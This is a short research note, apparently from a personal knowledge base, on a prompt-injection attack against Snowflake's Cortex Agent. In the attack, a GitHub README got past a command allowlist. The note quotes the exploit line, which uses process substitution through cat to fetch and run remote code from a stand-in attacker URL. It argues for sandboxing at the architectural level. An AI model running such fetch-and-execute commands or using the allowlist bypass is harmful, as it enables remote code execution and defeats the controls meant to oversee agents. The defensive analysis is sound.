Skip to content

Command allowlists create false security for AI agents — architectural sandboxing is required

Insight: Snowflake's Cortex Agent was exploited via prompt injection hidden in a GitHub README, using shell process substitution to bypass a command allowlist that whitelisted cat as safe. Simon Willison argues that command allowlists create a false sense of security because attackers consistently find techniques to circumvent pattern-based rules — deterministic sandboxes operating outside the agent layer represent the only robust defense.

Detail: The specific attack used cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)) — a process substitution technique that executes arbitrary code through an "allowed" command. PromptArmor reported the vulnerability. Willison's recommendation: treat any agent command as capable of anything the underlying process permits and build isolation at the architectural level (VMs, containers), not at the command-filtering level. This corroborates his earlier "betting against the models is a losing strategy" thesis and complements the Agents Rule of Two framework — demonstrating in practice why agents processing untrustworthy inputs (GitHub READMEs) should never have unrestricted system access.

Sources

Related: agents-rule-of-two in external/mcp.md — COMPLEMENTS; ai-agent-security-bet-against-models in external/mcp.md — CORROBORATES